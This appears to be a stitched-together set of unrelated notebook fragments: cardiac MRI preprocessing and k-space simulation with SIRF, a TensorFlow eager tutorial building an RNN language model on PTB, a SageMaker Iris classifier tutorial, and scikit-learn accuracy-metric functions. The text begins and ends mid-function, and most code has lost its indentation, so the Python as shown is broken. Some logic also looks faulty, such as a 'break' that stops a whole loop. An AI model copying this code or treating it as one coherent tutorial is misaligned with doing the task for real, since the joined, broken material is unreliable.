    # Return the immediate subdirectories of the given path.
    return [p for p in Path(path).iterdir() if p.is_dir()]
dirs_acdc = get_subdirs(root_path)
def crop_image(imgarr, cropped_size):
imgdims = np.array(imgarr.shape)//2
xstart = imgdims[0] - cropped_size//2
xend = imgdims[0] + cropped_size//2
ystart = imgdims[1] - cropped_size//2
yend = imgdims[1] + cropped_size//2
return imgarr[xstart:xend, ystart:yend,...]
def get_cropped_image(path: Path):
img = nib.load(str(path / "image.nii.gz"))
cropsize=128
cropped_arr = crop_image(img.get_fdata(), cropsize)
return np.squeeze(cropped_arr)
def get_formatted_image(path: Path, num_phases, time_usf):
img = get_cropped_image(path)
if img.shape[3] < num_phases:
return None
img = img[...,1:num_phases:time_usf]
return img
min_num_phases = 24
time_usf = 2
i=0
for curr_dir in tqdm(dirs_acdc):
list_patients = get_subdirs(curr_dir)
for pat in list_patients:
img = get_formatted_image(pat, min_num_phases, time_usf)
if img is None:
break
for islice in range(img.shape[2]):
dat = np.squeeze(img[:,:,islice,:])
dat = np.swapaxes(dat, 0, 2)
nii = nib.Nifti1Image(dat, np.eye(4))
nib.save(nii, str(fpath_output / "img_{}.nii".format(i)))
i += 1
```
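The center crop used in `crop_image` above can be sanity-checked with a plain-Python stand-in for the NumPy slicing:

```python
def center_crop_2d(img, size):
    # Take a size x size window centered on the image midpoint,
    # mirroring the index arithmetic in crop_image above.
    cx, cy = len(img) // 2, len(img[0]) // 2
    xs, ys = cx - size // 2, cy - size // 2
    return [row[ys:ys + size] for row in img[xs:xs + size]]

img = [[x * 10 + y for y in range(8)] for x in range(8)]  # 8x8 test image
crop = center_crop_2d(img, 4)
assert len(crop) == 4 and len(crop[0]) == 4
assert crop[0][0] == 22  # only rows/cols 2..5 survive the crop
```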
Now we have to prepare the k-space data.
```
import sirf.Gadgetron as pMR
import numpy as np
fname_template = fpath_output / "template/cine_128_30ph_bc.h5"
template_data = pMR.AcquisitionData(str(fname_template))
template_data = pMR.preprocess_acquisition_data(template_data)
template_phase = template_data.get_ISMRMRD_info("phase")
index_all_acquis = np.arange(template_data.number())
index_interesting_acquis = template_phase < (min_num_phases// time_usf)
index_interesting_acquis = index_all_acquis[index_interesting_acquis]
template_data = template_data.get_subset(index_interesting_acquis)
template_data = aux.undersample_cartesian_data(template_data)
print(template_data.shape)
import sirf.Reg as pReg
csm = pMR.CoilSensitivityData()
csm.calculate(template_data)
csm.fill(1 + 0. * 1j)
template_img = pMR.ImageData()
template_img.from_acquisition_data(template_data)
E = pMR.AcquisitionModel(acqs=template_data, imgs=template_img)
E.set_coil_sensitivity_maps(csm)
template_fwd = pMR.ImageData()
template_fwd.from_acquisition_data(template_data)
path_input = fpath_output
list_stacks = sorted(path_input.glob("img*"))
for f in tqdm(list_stacks):
fileidx = str(f.stem).split('_')[1]
nii = pReg.ImageData(str(f))
template_fwd.fill(nii.as_array())
rd = E.forward(template_fwd)
fout = fpath_output / "y_{}.h5".format(fileidx)
rd.write(str(fout))
list_rawdata = sorted(path_input.glob("y_*"))
for f in tqdm(list_rawdata):
fileidx = str(f.stem).split('_')[1]
ytmp = pMR.AcquisitionData(str(f))
itmp = E.backward(ytmp)
nii = nib.Nifti1Image(itmp.as_array(), np.eye(4))
fout = fpath_output / "cmplx_zfrecon_{}.nii".format(fileidx)
nib.save(nii,str(fout))
nii = nib.Nifti1Image(np.abs(itmp.as_array()), np.eye(4))
fout = fpath_output / "zfrecon_{}.nii".format(fileidx)
nib.save(nii,str(fout))
```
**Note**: The code has been adapted from the [official tutorial on using eager for LM](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/eager/python/examples/rnn_ptb/rnn_ptb.py)
In this notebook, we will explore how to build a **Neural Language Model**. Rather than directly showing code for the NLM, we will arrive at it step-by-step by discussing all key components.
We will also leverage **tf.data** to build our data pipeline, something we found to be missing in the official tutorial.
### P1: Enable Eager execution
* We use `tfe` to add variables
* `tf.enable_eager_execution()` should be the first command in your notebook. Note that executing it again throws an error! Restart your notebook kernel to re-execute.
```
import tensorflow as tf
import tensorflow.contrib.eager as tfe
tf.enable_eager_execution()
```
### P2: Fixed random seed
* A fixed random seed is required to reproduce your experiments!
* This can help you debug your code!
* You can select any number of your choice. We selected 42, any guesses why? :)
```
tf.set_random_seed(42)
```
### P3: Embedding Model
Let us begin by building an **Embedding Model**. The job of embedding model is simple: Given a tensor of word indexes, return corresponding vectors (or rows)
```
class Embedding(tf.keras.Model):
def __init__(self, V, d):
super(Embedding, self).__init__()
self.W = tfe.Variable(tf.random_uniform(minval=-1.0, maxval=1.0, shape=[V, d]))
def call(self, word_indexes):
return tf.nn.embedding_lookup(self.W, word_indexes)
```
Let us give it a try by finding embeddings for word indexes: 5 and 100
```
word_embeddings = Embedding(5000, 128)
vecs = word_embeddings([5, 100])
print(vecs.numpy().shape)
vecs = word_embeddings([[5, 100, 40], [2, 300, 90]])
print(vecs.numpy().shape)
```
### P4: RNN Cell...
We now have the ability to feed vectors for each time step. Now let us say we see two words and want to predict the third word in a sentence. We need a mechanism that can **summarize** all the words seen so far, and use the **summary** to generate a probability distribution for the next word.
**Recurrent Neural Network(RNN)** does precisely that: It maintains a lossy summary of the inputs seen so far!
<img src="recurrent_eqn@2x.png" alt="drawing" width="200"/>
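The recurrence in the figure, roughly $h_t = \tanh(W x_t + U h_{t-1} + b)$, can be illustrated with a toy scalar cell (the weights below are made up for illustration):

```python
import math

def rnn_step(x_t, h_prev, w_x=0.5, w_h=0.8, b=0.1):
    # One recurrence step: the new state mixes the current input
    # with the previous state, squashed through tanh.
    return math.tanh(w_x * x_t + w_h * h_prev + b)

h = 0.0  # initial state
for x in [1.0, -2.0, 0.5]:  # one "word vector" per time step
    h = rnn_step(x, h)
# h now holds a lossy summary of all three inputs.
assert -1.0 < h < 1.0
```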
Let us assume we have a batch of 2 sentences, each sentence has 3 words.
We will come to how RNN will handle variable length sentences...
```
word_indexes = [[20, 30, 400], [500, 0, 3]]
word_vectors = word_embeddings(word_indexes)
```
**Question**: What should be the shape of `word_vectors`? Recall the embedding returns vectors of size 128.
```
print(word_vectors.numpy().shape)
```
It seems we will not be able to pass the word_vectors directly. An RNN processes inputs **one time step** at a time!
Enter, [tf.unstack](https://www.tensorflow.org/api_docs/python/tf/unstack)

```
word_vectors_time = tf.unstack(word_vectors, axis=1)
print(f'word_vectors_time: len:{len(word_vectors_time)} Shape[0]: {word_vectors_time[0].shape}')
cell = tf.nn.rnn_cell.BasicRNNCell(256)
init_state = cell.zero_state(batch_size=int(word_vectors.shape[0]), dtype=tf.float32)
output, state = cell(word_vectors_time[0], init_state)
print(output.shape)
```
* You might be wondering: we only talked about the hidden state $h_t$ till now, so why are two vectors, output and state, being computed?
* For a BasicRNNCell output and state are identical.
* For LSTM and GRU they have different meaning. All we need to understand is that it uses state and output to do its magic of being able to maintain and learn long term dependencies.
* We would mostly use state to pass it to next time step, and output to make predictions at that time step.
* Read this [excellent blog post on LSTM](http://colah.github.io/posts/2015-08-Understanding-LSTMs/), in case you are interested in how LSTM works
### P5: RNN Model
Now, we have all the pieces to build an RNN Model. Let us see how this works:
```
class RNN(tf.keras.Model):
def __init__(self, h, cell):
super(RNN, self).__init__()
if cell == 'lstm':
self.cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=h)
elif cell == 'gru':
self.cell = tf.nn.rnn_cell.GRUCell(num_units=h)
else:
self.cell = tf.nn.rnn_cell.BasicRNNCell(num_units=h)
def call(self, word_vectors):
word_vectors_time = tf.unstack(word_vectors, axis=1)
outputs = []
state = self.cell.zero_state(batch_size=int(word_vectors.shape[0]), dtype=tf.float32)
for word_vector_time in word_vectors_time:
output, state = self.cell(word_vector_time, state)
outputs.append(output)
return outputs
word_indexes = [[20, 30, 400], [500, 0, 3]]
word_vectors = word_embeddings(word_indexes)
rnn = RNN(128, 'rnn')
rnn_outputs = rnn(word_vectors)
# Prints "Num outputs: 3 Shape[0]: (2, 128)"
print(f'Num outputs: {len(rnn_outputs)} Shape[0]: {rnn_outputs[0].numpy().shape}')
```
### P6: Data pipeline
We will work with a standard LM dataset: PTB dataset from Tomas Mikolov's webpage:
```bash
wget http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
tar xvf simple-examples.tgz
```
The first thing, we do with any data is to take a peek at it.
```bash
head -3 simple-examples/data/ptb.train.txt
```
```
aer banknote berlitz calloway centrust cluett fromstein gitano guterman hydro-quebec ipo kia memotec mlx nahb punts rake regatta rubens sim snack-food ssangyong swapo wachter
pierre <unk> N years old will join the board as a nonexecutive director nov. N
mr. <unk> is chairman of <unk> n.v. the dutch publishing group
```
Some key points to note:
* We see here that there is a $<unk>$ token already.
* There also seems another token $N$. This identifies a number.
* Rest all words seem to be lower cased
Let us count up the vocab quickly!
```
train_file = 'simple-examples/data/ptb.train.txt'
UNK='<unk>'
def count_words(sentences_file):
counter = {}
for sentence in open(sentences_file):
sentence = sentence.strip()
if not sentence:
continue
words = sentence.split()
for word in words:
counter[word] = counter.get(word, 0) + 1
return counter
counter = count_words(train_file)
print(f'Num unique words: {len(counter)}')
EOS = '<eos>'
```
We will add a special token EOS which signifies end of sentence. We add this to our vocabulary.
Let us now write the vocab to a file. Words are written in descending order of frequency, so the most common words get the smallest indexes (after the special tokens)...
```
def write_vocab(counter, vocab_file, unk=UNK, eos=EOS):
del counter[unk]
with open(vocab_file, 'w') as fw:
fw.write(f'{unk}\n')
fw.write(f'{eos}\n')
for word, _ in sorted(counter.items(), key=lambda pair:pair[1], reverse=True):
fw.write(f'{word}\n')
vocab_file = 'simple-examples/data/vocab.txt'
write_vocab(counter, vocab_file)
```
Peek at vocab file, see if the words make sense...
```bash
head simple-examples/data/vocab.txt
```
This generates the following:
```
<unk>
<eos>
the
N
of
to
a
in
and
's
```
Next, we want to create a data pipeline, we would create a batch of src words and corresponding target words.
Target words would be shifted right by one. Let us give a concrete example:
**Sentence**: "the cat sat on mat"
**Src_Words:**: ['the', 'cat', 'sat', 'on', 'mat']
**Tgt_Words:**: ['cat', 'sat', 'on', 'mat', '<eos\>']
<img src="data_tx@2x.png" alt="drawing" width="300"/>
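Before wiring this into `tf.data`, the shift can be demonstrated in plain Python, using the same `<eos>` convention:

```python
EOS = '<eos>'

def make_lm_pair(words):
    # The target sequence is the source shifted left by one,
    # with <eos> appended so every source word has a label.
    src = words
    tgt = words[1:] + [EOS]
    return src, tgt

src, tgt = make_lm_pair(['the', 'cat', 'sat', 'on', 'mat'])
assert src == ['the', 'cat', 'sat', 'on', 'mat']
assert tgt == ['cat', 'sat', 'on', 'mat', '<eos>']
```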
Let us begin by creating a vocab table:
```
from tensorflow.python.ops import lookup_ops
vocab_table = lookup_ops.index_table_from_file(vocab_file)
vocab_table.size()
def create_dataset(sentences_file, vocab_table, batch_size, eos=EOS):
#Create a Text Line dataset, which returns a string tensor
dataset = tf.data.TextLineDataset(sentences_file)
#Convert to a list of words..
dataset = dataset.map(lambda sentence: tf.string_split([sentence]).values)
#Create target words right shifted by one, append EOS, also return size of each sentence...
dataset = dataset.map(lambda words: (words, tf.concat([words[1:], [eos]], axis=0), tf.size(words)))
#Lookup words, word->integer, EOS->1
dataset = dataset.map(lambda src_words, tgt_words, num_words: (vocab_table.lookup(src_words), vocab_table.lookup(tgt_words), num_words))
#[None] -> src words, [None] -> tgt_words, [] length of sentence
dataset = dataset.padded_batch(batch_size=batch_size, padded_shapes=([None], [None], []))
return dataset
dataset = create_dataset(train_file, vocab_table, 32)
#Check out sample data!
next(iter(dataset))[2]
```
### P7: RNN Model (revisited)
Now that we have a way to load up data, let us see how our RNN model behaves...
```
word_embeddings = Embedding(V=vocab_table.size(), d=128)
datum = next(iter(dataset))
word_vectors = word_embeddings(datum[0])
word_vectors.numpy().shape
rnn = RNN(h=128, cell='rnn')
rnn_outputs = rnn(word_vectors)
print(f'Num outputs: {len(rnn_outputs)} Shape[0]: {rnn_outputs[0].numpy().shape}')
```
#### Zeroing out outputs past real sentence length!
One problem with our current RNN implementation is that it keeps processing even past the sentence length. For example, sentence 0 has length 24, but since the longest sentence in the first batch has length 48, the RNN returns outputs even past position 24. Let us confirm this:
```
datum[2][0]
rnn_outputs[40][0][:10]
```
We will use `tf.nn.static_rnn` to deal with the zeroing problem. As you can see below, it implements the time-step loop by itself!
```
class StaticRNN(tf.keras.Model):
def __init__(self, h, cell):
super(StaticRNN, self).__init__()
if cell == 'lstm':
self.cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=h)
elif cell == 'gru':
self.cell = tf.nn.rnn_cell.GRUCell(num_units=h)
else:
self.cell = tf.nn.rnn_cell.BasicRNNCell(num_units=h)
def call(self, word_vectors, num_words):
word_vectors_time = tf.unstack(word_vectors, axis=1)
outputs, final_state = tf.nn.static_rnn(cell=self.cell, inputs=word_vectors_time, sequence_length=num_words, dtype=tf.float32)
return outputs
srnn = StaticRNN(h=256, cell='rnn')
rnn_outputs = srnn(word_vectors, datum[2])
rnn_outputs[40][0][:10]
```
### P8: Language Model (Code)
At each time step, we want to predict a probability distribution over the entire vocabulary. Thus, we need to add an output layer.
```
class LanguageModel(tf.keras.Model):
def __init__(self, V, d, h, cell):
super(LanguageModel, self).__init__()
self.word_embedding = Embedding(V, d)
self.rnn = StaticRNN(h, cell)
self.output_layer = tf.keras.layers.Dense(units=V)
def call(self, datum):
word_vectors = self.word_embedding(datum[0])
rnn_outputs_time = self.rnn(word_vectors, datum[2])
#We want to convert it back to shape batch_size x TimeSteps x h
rnn_outputs = tf.stack(rnn_outputs_time, axis=1)
logits = self.output_layer(rnn_outputs)
return logits
lm = LanguageModel(vocab_table.size(), 128, 128, 'rnn')
```
What would be the shape of logits returned?
```
logits = lm(datum)
print(f'logits shape {logits.numpy().shape}')
```
### P9: Loss function
* At each time step, the RNN makes a prediction.
* More concretely, it generates V (here 10,000) logits.
We can compute the loss by comparing the predictions against the true labels. We will use Cross Entropy Loss.
* Cross Entropy measures distance between two probability distributions $p$ and $q$.
* When the true distribution puts all its probability mass on a single correct class, cross entropy simplifies to the negative log-probability of the target word!
<img src="cross_entropy@2x.png" alt="drawing" width="200"/>
* For numerical stability, you should never compute the target probability directly. Since our labels hold only the index of the correct word, we use `tf.nn.sparse_softmax_cross_entropy_with_logits` and pass the logits to it directly!
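This simplification can be checked by hand: with an integer label, the cross entropy over the whole vocabulary collapses to the negative log-probability of the single target word. Below is a pure-Python sketch of what `sparse_softmax_cross_entropy_with_logits` computes (minus TensorFlow's fused numerics):

```python
import math

def sparse_softmax_cross_entropy(logits, label):
    # Softmax normalizer over the vocabulary...
    m = max(logits)  # subtract the max for numerical stability
    log_z = m + math.log(sum(math.exp(l - m) for l in logits))
    # ...but the loss only ever reads the target word's logit.
    return log_z - logits[label]

logits = [2.0, 0.5, -1.0, 0.1]
# Putting the target on the most likely word gives the smallest loss.
assert sparse_softmax_cross_entropy(logits, 0) < sparse_softmax_cross_entropy(logits, 2)
# Uniform logits over V classes reproduce the -log(1/V) baseline.
assert abs(sparse_softmax_cross_entropy([0.0] * 10000, 0) - math.log(10000)) < 1e-9
```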
Now let us get some intuition about the loss values..
First let us compute cross entropy loss for a model that predicts each word equally likely. In this case the probability would be 1/V or 1/10000. This comes out to be 9.21
```
-tf.log(1/10000).numpy()
```
Now, let us see what is the loss for the first prediction on an untrained model!
```
lm = LanguageModel(vocab_table.size(), 128, 128, 'lstm')
logits = lm(datum)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=datum[1])
print(loss[0][0].numpy())
```
It seems we are not doing any better than a random prediction, which is fine, as we have not trained our model yet!
Next, we need to be careful about not adding any loss for the **padded values**.
Let us check out length of first sentence, and see what are loss values past the length
```
print(f'Len of first sentence: {datum[2][0]} Loss[{datum[2][0]}:]={loss[0][datum[2][0]:]}')
```
We actually don't want to accumulate this loss! We will zero it out using `tf.sequence_mask`, which creates a tensor of 0's and 1's according to each sequence length...
```
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = loss * mask
print(f'Len of first sentence: {datum[2][0]} Loss[{datum[2][0]}:]={loss[0][datum[2][0]:]}')
mask[0]
```
Finally, training happens over a batch: in this case 32 sentences, each with many words. Thus, we will compute an average loss over this batch.
We compute this by dividing the total loss for the batch by the total number of real (unpadded) words:
```
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = loss * mask
avg_loss = tf.reduce_sum(loss) / tf.reduce_sum(mask)
print(f'Avg loss: {avg_loss}')
def loss_fun(model, datum):
logits = model(datum)
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=datum[1]) * mask
return tf.reduce_sum(loss) / tf.cast(tf.reduce_sum(datum[2]), dtype=tf.float32)
```
### P10: Gradients Function
```
loss_and_grads_fun = tfe.implicit_value_and_gradients(loss_fun)
loss_value, gradients_value = loss_and_grads_fun(lm, datum)
print(loss_value)
```
### P11: Training Loop
```
import numpy as np
opt = tf.train.AdamOptimizer(learning_rate=0.001)
NUM_EPOCHS = 10
STATS_STEPS = 50
lm = LanguageModel(vocab_table.size(), 128, 128, 'lstm')
for epoch_num in range(NUM_EPOCHS):
batch_loss = []
for step_num, datum in enumerate(dataset, start=1):
loss_value, gradients = loss_and_grads_fun(lm, datum)
batch_loss.append(loss_value)
if step_num % STATS_STEPS == 0:
            print(f'Epoch: {epoch_num} Step: {step_num} Avg Loss: {np.average(np.asarray(batch_loss))}')
batch_loss = []
opt.apply_gradients(gradients, global_step=tf.train.get_or_create_global_step())
print(f'Epoch{epoch_num} Done!')
```
Let us check if the loss changed for the first batch!
```
loss_and_grads_fun(lm, datum)[0]
print(f'Old avg p_tgt: {np.exp(-9.21)} New: {np.exp(-loss_and_grads_fun(lm, datum)[0])}')
tf.train.get_or_create_global_step()
```
### P12: Saving your work!
```
import os
checkpoint_dir = 'lm'
checkpoint_prefix = os.path.join(checkpoint_dir, 'ckpt')
root = tfe.Checkpoint(optimizer=opt, model=lm, optimizer_step=tf.train.get_or_create_global_step())
root.save(checkpoint_prefix)
```
# Creating, training, and serving using SageMaker Estimators
The **SageMaker Python SDK** helps you deploy your models for training and hosting in optimized, production ready containers in SageMaker. The SageMaker Python SDK is easy to use, modular, extensible and compatible with TensorFlow and MXNet. This tutorial focuses on **TensorFlow** and shows how we can train and host a TensorFlow DNNClassifier estimator in SageMaker using the Python SDK.
TensorFlow's high-level machine learning API (tf.estimator) makes it easy to
configure, train, and evaluate a variety of machine learning models.
In this tutorial, you'll use tf.estimator to construct a
[neural network](https://en.wikipedia.org/wiki/Artificial_neural_network)
classifier and train it on the
[Iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set) to
predict flower species based on sepal/petal geometry. You'll write code to
perform the following six steps:
1. Deploy a TensorFlow container in SageMaker
2. Load CSVs containing Iris training/test data from a S3 bucket into a TensorFlow `Dataset`
3. Construct a `tf.estimator.DNNClassifier` neural network classifier
4. Train the model using the training data
5. Host the model in an endpoint
6. Classify new samples invoking the endpoint
This tutorial is a simplified version of TensorFlow's [get_started/estimator](https://www.tensorflow.org/get_started/estimator#fit_the_dnnclassifier_to_the_iris_training_data) tutorial **but using SageMaker and the SageMaker Python SDK** to simplify training and hosting.
## The Iris dataset
The [Iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set) contains
150 rows of data, comprising 50 samples from each of three related Iris species:
*Iris setosa*, *Iris virginica*, and *Iris versicolor*.
 **From left to right,
[*Iris setosa*](https://commons.wikimedia.org/w/index.php?curid=170298) (by
[Radomil](https://commons.wikimedia.org/wiki/User:Radomil), CC BY-SA 3.0),
[*Iris versicolor*](https://commons.wikimedia.org/w/index.php?curid=248095) (by
[Dlanglois](https://commons.wikimedia.org/wiki/User:Dlanglois), CC BY-SA 3.0),
and [*Iris virginica*](https://www.flickr.com/photos/33397993@N05/3352169862)
(by [Frank Mayfield](https://www.flickr.com/photos/33397993@N05), CC BY-SA
2.0).**
Each row contains the following data for each flower sample:
[sepal](https://en.wikipedia.org/wiki/Sepal) length, sepal width,
[petal](https://en.wikipedia.org/wiki/Petal) length, petal width, and flower
species. Flower species are represented as integers, with 0 denoting *Iris
setosa*, 1 denoting *Iris versicolor*, and 2 denoting *Iris virginica*.
Sepal Length | Sepal Width | Petal Length | Petal Width | Species
:----------- | :---------- | :----------- | :---------- | :-------
5.1 | 3.5 | 1.4 | 0.2 | 0
4.9 | 3.0 | 1.4 | 0.2 | 0
4.7 | 3.2 | 1.3 | 0.2 | 0
… | … | … | … | …
7.0 | 3.2 | 4.7 | 1.4 | 1
6.4 | 3.2 | 4.5 | 1.5 | 1
6.9 | 3.1 | 4.9 | 1.5 | 1
… | … | … | … | …
6.5 | 3.0 | 5.2 | 2.0 | 2
6.2 | 3.4 | 5.4 | 2.3 | 2
5.9 | 3.0 | 5.1 | 1.8 | 2
For this tutorial, the Iris data has been randomized and split into two separate
CSVs:
* A training set of 120 samples
iris_training.csv
* A test set of 30 samples
iris_test.csv
These files are provided in the SageMaker sample data bucket:
**s3://sagemaker-sample-data-{region}/tensorflow/iris**. Copies of the bucket exist in each SageMaker region. When we access the data, we'll replace {region} with the AWS region the notebook is running in.
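Resolving the regionalized bucket name can be sketched like this (the helper name is ours; on a notebook instance the region itself would typically come from `boto3.Session().region_name`):

```python
def iris_data_uri(region: str) -> str:
    # Substitute the running region into the regionalized bucket name.
    return "s3://sagemaker-sample-data-{}/tensorflow/iris".format(region)

assert iris_data_uri("us-west-2") == "s3://sagemaker-sample-data-us-west-2/tensorflow/iris"
```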
## Let us first initialize variables
```
from sagemaker import get_execution_role
from sagemaker.session import Session
# S3 bucket for saving code and model artifacts.
# Feel free to specify a different bucket here if you wish.
bucket = Session().default_bucket()
# Location to save your custom code in tar.gz format.
custom_code_upload_location = 's3://{}/customcode/tensorflow_iris'.format(bucket)
# Location where results of model training are saved.
model_artifacts_location = 's3://{}/artifacts'.format(bucket)
#IAM execution role that gives SageMaker access to resources in your AWS account.
role = get_execution_role()
```
# tf.estimator
The tf.estimator framework makes it easy to construct and train machine learning models via its high-level Estimator API. Estimator offers classes you can instantiate to quickly configure common model types such as regressors and classifiers:
* **```tf.estimator.LinearClassifier```**:
Constructs a linear classification model.
* **```tf.estimator.LinearRegressor```**:
Constructs a linear regression model.
* **```tf.estimator.DNNClassifier```**:
Construct a neural network classification model.
* **```tf.estimator.DNNRegressor```**:
Construct a neural network regression model.
* **```tf.estimator.DNNLinearCombinedClassifier```**:
Construct a neural network and linear combined classification model.
* **```tf.estimator.DNNLinearCombinedRegressor```**:
Construct a neural network and linear combined regression model.
More information about estimators can be found [here](https://www.tensorflow.org/extend/estimators)
# Construct a deep neural network classifier
## Complete neural network source code
Here is the full code for the neural network classifier:
```
!cat "iris_dnn_classifier.py"
```
With a few lines of code, using SageMaker and TensorFlow, you can create a deep neural network model that is ready for training and hosting. Let's take a deeper look at the code.
### Using a tf.estimator in SageMaker
Using a TensorFlow estimator in SageMaker is straightforward; you can create one in just a few lines of code:
```
def estimator(model_path, hyperparameters):
feature_columns = [tf.feature_column.numeric_column(INPUT_TENSOR_NAME, shape=[4])]
return tf.estimator.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir=model_path)
```
The code above first defines the model's feature columns, which specify the data
type for the features in the data set. All the feature data is continuous, so
`tf.feature_column.numeric_column` is the appropriate function to use to
construct the feature columns. There are four features in the data set (sepal
length, sepal width, petal length, and petal width), so accordingly `shape`
must be set to `[4]` to hold all the data.
Then, the code creates a `DNNClassifier` model using the following arguments:
* `feature_columns=feature_columns`. The set of feature columns defined above.
* `hidden_units=[10, 20, 10]`. Three
[hidden layers](http://stats.stackexchange.com/questions/181/how-to-choose-the-number-of-hidden-layers-and-nodes-in-a-feedforward-neural-netw),
containing 10, 20, and 10 neurons, respectively.
* `n_classes=3`. Three target classes, representing the three Iris species.
* `model_dir=model_path`. The directory in which TensorFlow will save
checkpoint data during model training.
### Describe the training input pipeline
The `tf.estimator` API uses input functions, which create the TensorFlow
operations that generate data for the model.
We can use `tf.estimator.inputs.numpy_input_fn` to produce the input pipeline:
```
def train_input_fn(training_dir, hyperparameters):
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=os.path.join(training_dir, 'iris_training.csv'),
target_dtype=np.int,
features_dtype=np.float32)
return tf.estimator.inputs.numpy_input_fn(
x={INPUT_TENSOR_NAME: np.array(training_set.data)},
y=np.array(training_set.target),
num_epochs=None,
shuffle=True)()
```
### Describe the serving input pipeline:
After training your model, SageMaker will host it using TensorFlow Serving. You need to describe a serving input function:
```
def serving_input_fn(hyperparameters):
feature_spec = {INPUT_TENSOR_NAME: tf.FixedLenFeature(dtype=tf.float32, shape=[4])}
return tf.estimator.export.build_parsing_serving_input_receiver_fn(feature_spec)()
```
Now we are ready to submit the script for training.
# Train a Model on Amazon SageMaker using TensorFlow custom code
We can use the SDK to run our local training script on SageMaker infrastructure.
1. Pass the path to the iris_dnn_classifier.py file, which contains the functions for defining your estimator, to the sagemaker.TensorFlow init method.
2. Pass the S3 location of the training data to the fit() method.
```
from sagemaker.tensorflow import TensorFlow
iris_estimator = TensorFlow(entry_point='iris_dnn_classifier.py',
role=role,
framework_version='1.12.0',
output_path=model_artifacts_location,
code_location=custom_code_upload_location,
train_instance_count=1,
train_instance_type='ml.c4.xlarge',
training_steps=1000,
                            evaluation_steps=100)
```
```
%%time
import boto3
# use the region-specific sample data bucket
region = boto3.Session().region_name
train_data_location = 's3://sagemaker-sample-data-{}/tensorflow/iris'.format(region)
iris_estimator.fit(train_data_location)
```
# Deploy the trained Model
The deploy() method creates an endpoint which serves prediction requests in real-time.
```
%%time
iris_predictor = iris_estimator.deploy(initial_instance_count=1,
instance_type='ml.m4.xlarge')
```
# Invoke the Endpoint to get inferences
Invoking prediction:
```
iris_predictor.predict([6.4, 3.2, 4.5, 1.5]) #expected label to be 1
```
# (Optional) Delete the Endpoint
After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it.
```
print(iris_predictor.endpoint)
import sagemaker
sagemaker.Session().delete_endpoint(iris_predictor.endpoint)
```
```
import os
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, cohen_kappa_score, classification_report, precision_score, recall_score, f1_score, precision_recall_fscore_support
def gather_accuracy_values_per_class(classes,targets,scores):
"""
Gather per class a variety of accuracy metrics from targets and scores
"""
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
precision_, recall_, fscore_, support_ = precision_recall_fscore_support(y_true, y_pred, beta=0.5, average=None)
fscore = pd.Series(index=classes, data=fscore_, name="f-score")
precision = pd.Series(index=classes, data=precision_, name="precision")
recall = pd.Series(index=classes, data=recall_, name="recall")
support = pd.Series(index=classes, data=support_, name="support")
s = [fscore,precision,recall, support]
names = [el.name for el in s]
    return pd.DataFrame(list(zip(*s)), columns=names, index=recall.index).T
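# --- Hypothetical smoke test (not from the original analysis): illustrates the
# --- expected input shapes with 3 toy classes and one-hot targets/scores.
toy_classes = ["a", "b", "c"]
toy_targets = np.eye(3)[[0, 1, 2, 0]]   # true labels 0, 1, 2, 0 as one-hot rows
toy_scores = np.eye(3)[[0, 1, 1, 0]]    # predicted labels 0, 1, 1, 0
# Rows are f-score/precision/recall/support, columns are the class names.
print(gather_accuracy_values_per_class(toy_classes, toy_targets, toy_scores))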
import numpy as np
from sklearn.metrics import roc_curve, roc_auc_score, accuracy_score, cohen_kappa_score, classification_report, precision_score, recall_score, f1_score, precision_recall_fscore_support
def gather_mean_accuracies(classes, scores, targets, average='weighted', label="label", b=0):
"""
    calculate a series of mean accuracy values for all, covered (class id < b) and field (class id >= b) classes
"""
metrics = []
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
all_mask = np.ones(y_true.shape)
covered_mask = y_true<b
field_mask = y_true>=b
# class weighted average accuracy
w_all = np.ones(y_true.shape[0])
for idx, i in enumerate(np.bincount(y_true)):
w_all[y_true == idx] *= (i/float(y_true.shape[0]))
w_cov = np.ones(y_true[covered_mask].shape[0])
for idx, i in enumerate(np.bincount(y_true[covered_mask])):
w_cov[y_true[covered_mask] == idx] *= (i/float(y_true[covered_mask].shape[0]))
w_field = np.ones(y_true[field_mask].shape[0])
for idx, i in enumerate(np.bincount(y_true[field_mask])):
w_field[y_true[field_mask] == idx] *= (i/float(y_true[field_mask].shape[0]))
w_acc = accuracy_score(y_true, y_pred, sample_weight=w_all)
#w_acc_cov = accuracy_score(y_true[covered_mask], y_pred[covered_mask], sample_weight=w_cov)
w_acc_field = accuracy_score(y_true[field_mask], y_pred[field_mask], sample_weight=w_field)
#metrics.append(pd.Series(data=[w_acc, w_acc_cov, w_acc_field], dtype=float, name="accuracy"))
metrics.append(pd.Series(data=[w_acc, w_acc_field], dtype=float, name="accuracy"))
# AUC
try:
# if AUC not possible skip
auc = roc_auc_score(targets, scores, average=average)
#auc_cov = roc_auc_score(targets[covered_mask,:b], scores[covered_mask,:b], average=average)
auc_field = roc_auc_score(targets[field_mask,b:], scores[field_mask,b:], average=average)
#metrics.append(pd.Series(data=[auc, auc_cov, auc_field], dtype=float, name="AUC"))
metrics.append(pd.Series(data=[auc, auc_field], dtype=float, name="AUC"))
except:
        print("no AUC calculated")
pass
# Kappa
kappa = cohen_kappa_score(y_true, y_pred)
#kappa_cov = cohen_kappa_score(y_true[covered_mask], y_pred[covered_mask])
kappa_field = cohen_kappa_score(y_true[field_mask], y_pred[field_mask])
#metrics.append(pd.Series(data=[kappa, kappa_cov, kappa_field], dtype=float, name="kappa"))
metrics.append(pd.Series(data=[kappa, kappa_field], dtype=float, name="kappa"))
# Precision, Recall, F1, support
prec, rec, f1, support = precision_recall_fscore_support(y_true, y_pred, beta=1, average=average)
